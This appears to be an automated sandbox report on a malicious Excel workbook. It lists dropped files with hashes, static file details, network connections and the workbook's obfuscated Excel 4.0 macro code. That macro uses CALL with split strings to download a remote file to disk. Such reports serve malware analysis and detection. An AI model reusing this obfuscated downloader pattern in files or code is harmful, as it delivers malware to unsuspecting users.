                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                Size (bytes):494
                                                                                                                                                                                                Entropy (8bit):4.962239405540505
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:12:hnMQbwzRQ6QclfhxxEdWr+YZrH3atJMlgOt0quoQL:hMxRQspxCQnZrH3atEx0h
                                                                                                                                                                                                MD5:0357AA49EA850B11B99D09A2479C321B
                                                                                                                                                                                                SHA1:41472BA5C40F61FA1C77C42CF06248F13B8785F0
                                                                                                                                                                                                SHA-256:0FF0B7FCB090C65D0BDCB2AF4BBD2C30F33356B3CE9B117186FA20391EF840A3
                                                                                                                                                                                                SHA-512:A317A0F035B8DFF7CA60C76B0B75698A3528FD4C7C5E915292C982D2B38C1C937C318362C891E93BEE6FDB1B166764D7183140A837FD23DAA2BE3D2DAC5A5DFC
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                IE Cache URL:https://dentistelmhurstny.com/cgi-sys/suspendedpage.cgi
                                                                                                                                                                                                Preview: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">.<html>. <head>. <title>Contact Support</title>. <meta http-equiv="Content-Type" content="text/html; charset=utf-8">. </head>. <body marginwidth="0" marginheight="0" leftmargin="0" topmargin="0">. <iframe width="100%" height="100%" frameborder="0" SCROLLING="auto" marginwidth="0" src="http://fwdssp.com/?dn=referer_detect&pid=5POL4F2O4"></iframe>. </body>.</html>.
                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\36720000
                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):107587
                                                                                                                                                                                                Entropy (8bit):7.916246287611959
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:1536:nmngdN7g992hjPcQpWUot9ErpPX44sh0x13TQf830:nVX7g9opH8x+lxs6ZQH
                                                                                                                                                                                                MD5:683627130CC7C64C5B5F60754347DD43
                                                                                                                                                                                                SHA1:2614047B97BDAD3881FDD6790644FD86759841C0
                                                                                                                                                                                                SHA-256:290B5B12CFA80C3DF38CCAC6C3CC9772BE67D564C7D3C3BC9149DE67577664F0
                                                                                                                                                                                                SHA-512:5FD11DDBB16843280211CAF0CF07F1BACF58B0397FD5F7A15243981F8F476C8DE3B67CA0F52E5122E0EC4ACAD836D8FAED6BF6D397CD4C5C15CCF991CFF24DFA
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview: .U.N.0.}G..".....j..]xd.`?....U..1.....P.*-.....s.3.^....!...e..U.W.u-.w.].d.&.0.A...rvz2._.......O)...e.V`..8.,|.".k.x.r):.......K.R.2..M..B<.T].hy.d...~o..T-.!.-E"...w$._,....%..C....H.4!jb.w.........{.m..wgD08N..CC....u.32......!./50j....FXr.....q9.~....fZ.a%.4.......s....=+..T2....'(.n.......:..A.u.|Z.....2.n<.h.U]..........>...6bZ..o.2..C............>.CE.%...x...}.4+o..H.8.x..'Y...AL...l..2.,?.....j.7/...?.......PK..........!.t...............[Content_Types].xml ...(....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Thu Jun 27 18:52:18 2019, mtime=Tue May 4 11:34:31 2021, atime=Tue May 4 11:34:31 2021, length=12288, window=hide
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):917
                                                                                                                                                                                                Entropy (8bit):4.636081879114352
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:12:86K20UnWCHodDDY29S+WMjA+N/E2ybD83c5IeYIe8k44t2Y+xIBjKZm:8tfRAS8HD+w7aB6m
                                                                                                                                                                                                MD5:DA68531A8207958DA306B27002FA43BD
                                                                                                                                                                                                SHA1:4DD7C73F822FB2896F68CF2A3B7824041C729595
                                                                                                                                                                                                SHA-256:999E59AB1EF231B238C9EF231238F620E074A719287C5EA24997440372325930
                                                                                                                                                                                                SHA-512:BB2165CE5FA3D588200DF99678396AA334FFE4B71D22BDE9FC3F6FD830CDE858AEE32277BB156BF8DAC9572A256EB530013E6018605C9583094453CAC3C90FFC
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview: L..................F..........h.!-..Lk...@..Lk...@...0...........................P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L...REd....................:.....Q...U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....Z.1.....>Qa{..user..B.......N...REd.....S.....................N,.e.n.g.i.n.e.e.r.....~.1......RPd..Desktop.h.......N...RPd.....Y..............>......*.D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......H...............-.......G...........>.S......C:\Users\user\Desktop........\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...A}...`.......X.......320946...........!a..%.H.VZAj...,,/..........-$..!a..%.H.VZAj...,,/..........-$.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........9...1SPS..mD..pH.H@..=x.....h....H......K*..@.A..7sFJ............
                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\catalog-1521295750.LNK
                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 30 14:26:59 2020, mtime=Tue May 4 11:34:31 2021, atime=Tue May 4 11:34:31 2021, length=107587, window=hide
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):2226
                                                                                                                                                                                                Entropy (8bit):4.715078790688507
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:24:8WDX3LvAK8vHD+O777aB6myWDX3LvAK8vHD+O777aB6m:8WL0KIH7iB6pWL0KIH7iB6
                                                                                                                                                                                                MD5:446CFD342B429B6AA36AAB4FCDE902C4
                                                                                                                                                                                                SHA1:B4086EB47613C6F63EED892A7B94FD67E84F17E0
                                                                                                                                                                                                SHA-256:360989D988D6C367004073AF1CC988702F070F8F09F38C41982FAA45A4F9BC12
                                                                                                                                                                                                SHA-512:6864A08A85A786FD0B53DD155BC7F7DE843E6DF5B3561F3D468E21584895E74A9541B3BAFF75754D790211342E2BA29A084B137A1B98E18C858F8A7E6534292F
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview: L..................F.... ....&.#>...N.-..@...W+..@..C............................P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L...REd....................:.....Q...U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....Z.1.....>Qa{..user..B.......N...REd.....S.....................N,.e.n.g.i.n.e.e.r.....~.1.....>Qc{..Desktop.h.......N...REd.....Y..............>......j+.D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....|.2......RKd .CATALO~1.XLS..`......>Q`{.RKd.....R.....................D..c.a.t.a.l.o.g.-.1.5.2.1.2.9.5.7.5.0...x.l.s.m.......`...............-......._...........>.S......C:\Users\user\Desktop\catalog-1521295750.xlsm........\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.c.a.t.a.l.o.g.-.1.5.2.1.2.9.5.7.5.0...x.l.s.m.........:..,.LB.)...A}...`.......X.......320946...........!a..%.H.VZAj.......1........-$..!a..%.H.VZAj.......1........-$.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.
                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):120
                                                                                                                                                                                                Entropy (8bit):4.775543017683304
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:bDesBVomxWN46J7YeJrJ7YmxWN46J7Yv:bSsj+jfVKju
                                                                                                                                                                                                MD5:DCDB0C33076965B840C9CCEF827DA6F0
                                                                                                                                                                                                SHA1:4273BF0AD88312312DBEDDF12230A54999DCDD6A
                                                                                                                                                                                                SHA-256:2F3A97491D343F1BDD79DAA869B0AAE8F446F7118A46C6CDA9F1CBC9F01B5A4B
                                                                                                                                                                                                SHA-512:81C70C0FF785F856ACDF76018FEC258ACD4478D213C0C015CFE8623788FFBF48E9FD712AFD19A7A5784239D5DBB00BF835856CA3D4D643EFDA930F3D80DB709C
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview: [folders]..Desktop.LNK=0..[misc]..catalog-1521295750.LNK=0..catalog-1521295750.LNK=0..[misc]..catalog-1521295750.LNK=0..
                                                                                                                                                                                                C:\Users\user\Desktop\37720000
                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):107587
                                                                                                                                                                                                Entropy (8bit):7.916246287611959
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:1536:nmngdN7g992hjPcQpWUot9ErpPX44sh0x13TQf830:nVX7g9opH8x+lxs6ZQH
                                                                                                                                                                                                MD5:683627130CC7C64C5B5F60754347DD43
                                                                                                                                                                                                SHA1:2614047B97BDAD3881FDD6790644FD86759841C0
                                                                                                                                                                                                SHA-256:290B5B12CFA80C3DF38CCAC6C3CC9772BE67D564C7D3C3BC9149DE67577664F0
                                                                                                                                                                                                SHA-512:5FD11DDBB16843280211CAF0CF07F1BACF58B0397FD5F7A15243981F8F476C8DE3B67CA0F52E5122E0EC4ACAD836D8FAED6BF6D397CD4C5C15CCF991CFF24DFA
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview: .U.N.0.}G..".....j..]xd.`?....U..1.....P.*-.....s.3.^....!...e..U.W.u-.w.].d.&.0.A...rvz2._.......O)...e.V`..8.,|.".k.x.r):.......K.R.2..M..B<.T].hy.d...~o..T-.!.-E"...w$._,....%..C....H.4!jb.w.........{.m..wgD08N..CC....u.32......!./50j....FXr.....q9.~....fZ.a%.4.......s....=+..T2....'(.n.......:..A.u.|Z.....2.n<.h.U]..........>...6bZ..o.2..C............>.CE.%...x...}.4+o..H.8.x..'Y...AL...l..2.,?.....j.7/...?.......PK..........!.t...............[Content_Types].xml ...(....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                C:\Users\user\Desktop\~$catalog-1521295750.xlsm
                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):330
                                                                                                                                                                                                Entropy (8bit):1.6081032063576088
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:RFXI6dtBhFXI6dtt:RJZhJ1
                                                                                                                                                                                                MD5:836727206447D2C6B98C973E058460C9
                                                                                                                                                                                                SHA1:D83351CF6DE78FEDE0142DE5434F9217C4F285D2
                                                                                                                                                                                                SHA-256:D9BECB14EECC877F0FA39B6B6F856365CADF730B64E7FA2163965D181CC5EB41
                                                                                                                                                                                                SHA-512:7F843EDD7DC6230BF0E05BF988D25AE6188F8B22808F2C990A1E8039C0CECC25D1D101E0FDD952722FEAD538F7C7C14EEF9FD7F4B31036C3E7F79DE570CD0607
                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                Preview: .pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                                                C:\Users\user\jordji.nbvt11
                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                                File Type:HTML document, ASCII text
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):494
                                                                                                                                                                                                Entropy (8bit):4.962239405540505
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:12:hnMQbwzRQ6QclfhxxEdWr+YZrH3atJMlgOt0quoQL:hMxRQspxCQnZrH3atEx0h
                                                                                                                                                                                                MD5:0357AA49EA850B11B99D09A2479C321B
                                                                                                                                                                                                SHA1:41472BA5C40F61FA1C77C42CF06248F13B8785F0
                                                                                                                                                                                                SHA-256:0FF0B7FCB090C65D0BDCB2AF4BBD2C30F33356B3CE9B117186FA20391EF840A3
                                                                                                                                                                                                SHA-512:A317A0F035B8DFF7CA60C76B0B75698A3528FD4C7C5E915292C982D2B38C1C937C318362C891E93BEE6FDB1B166764D7183140A837FD23DAA2BE3D2DAC5A5DFC
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">.<html>. <head>. <title>Contact Support</title>. <meta http-equiv="Content-Type" content="text/html; charset=utf-8">. </head>. <body marginwidth="0" marginheight="0" leftmargin="0" topmargin="0">. <iframe width="100%" height="100%" frameborder="0" SCROLLING="auto" marginwidth="0" src="http://fwdssp.com/?dn=referer_detect&pid=5POL4F2O4"></iframe>. </body>.</html>.

                                                                                                                                                                                                Static File Info

                                                                                                                                                                                                General

                                                                                                                                                                                                File type:Microsoft Excel 2007+
                                                                                                                                                                                                Entropy (8bit):7.916734269896108
                                                                                                                                                                                                TrID:
                                                                                                                                                                                                • Excel Microsoft Office Open XML Format document (40004/1) 83.33%
                                                                                                                                                                                                • ZIP compressed archive (8000/1) 16.67%
                                                                                                                                                                                                File name:catalog-1521295750.xlsm
                                                                                                                                                                                                File size:109044
                                                                                                                                                                                                MD5:72b06d3f0889125b6696fe55db6ff6ab
                                                                                                                                                                                                SHA1:a285f7bc7a6f79885d81de91420e85f223c6f18f
                                                                                                                                                                                                SHA256:bbdaa820461e1e4fbde6b4b79ea407d4c644fb8e227432b879e2eb01bd391f4a
                                                                                                                                                                                                SHA512:a918a3fc3830ed90d90b617c1473e4ff395edcb952b5bb8b4cd315c74f761f5a1cfcd6759fadc5a347bd55cf11957d5b8a0cd5a5e289bf2b0a194d118dd67688
                                                                                                                                                                                                SSDEEP:3072:cmIxNUlpIfw8SGopH8x+iHdoLqp6vif+zUD:cmIr4Ga8x7HdLp6vif+zUD
                                                                                                                                                                                                File Content Preview:PK..........!.t...............[Content_Types].xml ...(.........""..............................................................................................................................................................................................

                                                                                                                                                                                                File Icon

                                                                                                                                                                                                Icon Hash:74ecd0e2f696908c

                                                                                                                                                                                                Static OLE Info

                                                                                                                                                                                                General

                                                                                                                                                                                                Document Type:OpenXML
                                                                                                                                                                                                Number of OLE Files:1

                                                                                                                                                                                                OLE File "catalog-1521295750.xlsm"

                                                                                                                                                                                                Indicators

                                                                                                                                                                                                Has Summary Info:
                                                                                                                                                                                                Application Name:
                                                                                                                                                                                                Encrypted Document:
                                                                                                                                                                                                Contains Word Document Stream:
                                                                                                                                                                                                Contains Workbook/Book Stream:
                                                                                                                                                                                                Contains PowerPoint Document Stream:
                                                                                                                                                                                                Contains Visio Document Stream:
                                                                                                                                                                                                Contains ObjectPool Stream:
                                                                                                                                                                                                Flash Objects Count:
                                                                                                                                                                                                Contains VBA Macros:

                                                                                                                                                                                                Macro 4.0 Code

                                                                                                                                                                                                ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
                                                                                                                                                                                                ,,,=HALT(),,,,,,,,,,,,"=4984654+9846544+468464=CALL(Sheet2!AY107&""n"",Sheet2!AY108&""A"",Sheet2!AY118,before.3.21.42.sheet!AR49,Sheet2!AT114,before.3.21.42.sheet!AT39,0,0)=CALL(Sheet2!AY107&""n"",Sheet2!AY108&""A"",Sheet2!AY118,before.3.21.42.sheet!AR49,Sheet2!AT115,before.3.21.42.sheet!AT39&""1"",0,0)",,,,,,,,,,,,,,,=Sheet2!AW142(),,,,,,,,,,,,,,,,,,,,,U,J,",D",..\jordji.nbvt1R,J,l,L,C,l,D,C,R,o,B,e,w,B,g,n,,i,l,,s,o,,t,a,,e,d,0,r,T,,S,o,,e,F,,r,i,,ve,l,,r,e,,,

                                                                                                                                                                                                Network Behavior

                                                                                                                                                                                                Network Port Distribution

                                                                                                                                                                                                TCP Packets

                                                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                May 4, 2021 05:34:32.415355921 CEST49711443192.168.2.6192.185.20.98
                                                                                                                                                                                                May 4, 2021 05:34:32.578008890 CEST44349711192.185.20.98192.168.2.6
                                                                                                                                                                                                May 4, 2021 05:34:32.578094006 CEST49711443192.168.2.6192.185.20.98
                                                                                                                                                                                                May 4, 2021 05:34:32.579137087 CEST49711443192.168.2.6192.185.20.98
                                                                                                                                                                                                May 4, 2021 05:34:32.741477966 CEST44349711192.185.20.98192.168.2.6
                                                                                                                                                                                                May 4, 2021 05:34:32.743772984 CEST44349711192.185.20.98192.168.2.6
                                                                                                                                                                                                May 4, 2021 05:34:32.743791103 CEST44349711192.185.20.98192.168.2.6
                                                                                                                                                                                                May 4, 2021 05:34:32.743807077 CEST44349711192.185.20.98192.168.2.6
                                                                                                                                                                                                May 4, 2021 05:34:32.743818998 CEST44349711192.185.20.98192.168.2.6
                                                                                                                                                                                                May 4, 2021 05:34:32.743855953 CEST49711443192.168.2.6192.185.20.98
                                                                                                                                                                                                May 4, 2021 05:34:32.743910074 CEST49711443192.168.2.6192.185.20.98
                                                                                                                                                                                                May 4, 2021 05:34:32.748213053 CEST44349711192.185.20.98192.168.2.6
                                                                                                                                                                                                May 4, 2021 05:34:32.748260975 CEST49711443192.168.2.6192.185.20.98
                                                                                                                                                                                                May 4, 2021 05:34:32.794291973 CEST49711443192.168.2.6192.185.20.98
                                                                                                                                                                                                May 4, 2021 05:34:32.961011887 CEST44349711192.185.20.98192.168.2.6
                                                                                                                                                                                                May 4, 2021 05:34:32.961102009 CEST49711443192.168.2.6192.185.20.98
                                                                                                                                                                                                May 4, 2021 05:34:32.962173939 CEST49711443192.168.2.6192.185.20.98
                                                                                                                                                                                                May 4, 2021 05:34:33.165601015 CEST44349711192.185.20.98192.168.2.6
                                                                                                                                                                                                May 4, 2021 05:34:33.611238956 CEST44349711192.185.20.98192.168.2.6
                                                                                                                                                                                                May 4, 2021 05:34:33.611450911 CEST49711443192.168.2.6192.185.20.98
                                                                                                                                                                                                May 4, 2021 05:34:33.611742973 CEST44349711192.185.20.98192.168.2.6
                                                                                                                                                                                                May 4, 2021 05:34:33.611799955 CEST49711443192.168.2.6192.185.20.98
                                                                                                                                                                                                May 4, 2021 05:34:33.687551022 CEST49715443192.168.2.6192.185.5.2
                                                                                                                                                                                                May 4, 2021 05:34:33.850142956 CEST44349715192.185.5.2192.168.2.6
                                                                                                                                                                                                May 4, 2021 05:34:33.850286007 CEST49715443192.168.2.6192.185.5.2
                                                                                                                                                                                                May 4, 2021 05:34:33.850871086 CEST49715443192.168.2.6192.185.5.2
                                                                                                                                                                                                May 4, 2021 05:34:34.013493061 CEST44349715192.185.5.2192.168.2.6
                                                                                                                                                                                                May 4, 2021 05:34:34.018266916 CEST44349715192.185.5.2192.168.2.6
                                                                                                                                                                                                May 4, 2021 05:34:34.018289089 CEST44349715192.185.5.2192.168.2.6
                                                                                                                                                                                                May 4, 2021 05:34:34.018299103 CEST44349715192.185.5.2192.168.2.6
                                                                                                                                                                                                May 4, 2021 05:34:34.018366098 CEST49715443192.168.2.6192.185.5.2
                                                                                                                                                                                                May 4, 2021 05:34:34.028089046 CEST49715443192.168.2.6192.185.5.2
                                                                                                                                                                                                May 4, 2021 05:34:34.191406012 CEST44349715192.185.5.2192.168.2.6
                                                                                                                                                                                                May 4, 2021 05:34:34.191571951 CEST49715443192.168.2.6192.185.5.2
                                                                                                                                                                                                May 4, 2021 05:34:34.192357063 CEST49715443192.168.2.6192.185.5.2
                                                                                                                                                                                                May 4, 2021 05:34:34.367104053 CEST44349715192.185.5.2192.168.2.6
                                                                                                                                                                                                May 4, 2021 05:34:34.367396116 CEST44349715192.185.5.2192.168.2.6
                                                                                                                                                                                                May 4, 2021 05:34:34.367469072 CEST49715443192.168.2.6192.185.5.2
                                                                                                                                                                                                May 4, 2021 05:34:34.367501020 CEST49715443192.168.2.6192.185.5.2
                                                                                                                                                                                                May 4, 2021 05:34:34.368302107 CEST49715443192.168.2.6192.185.5.2
                                                                                                                                                                                                May 4, 2021 05:34:34.371063948 CEST49717443192.168.2.6192.185.5.2
                                                                                                                                                                                                May 4, 2021 05:34:34.531192064 CEST44349715192.185.5.2192.168.2.6
                                                                                                                                                                                                May 4, 2021 05:34:34.534118891 CEST44349717192.185.5.2192.168.2.6
                                                                                                                                                                                                May 4, 2021 05:34:34.534271002 CEST49717443192.168.2.6192.185.5.2
                                                                                                                                                                                                May 4, 2021 05:34:34.534954071 CEST49717443192.168.2.6192.185.5.2
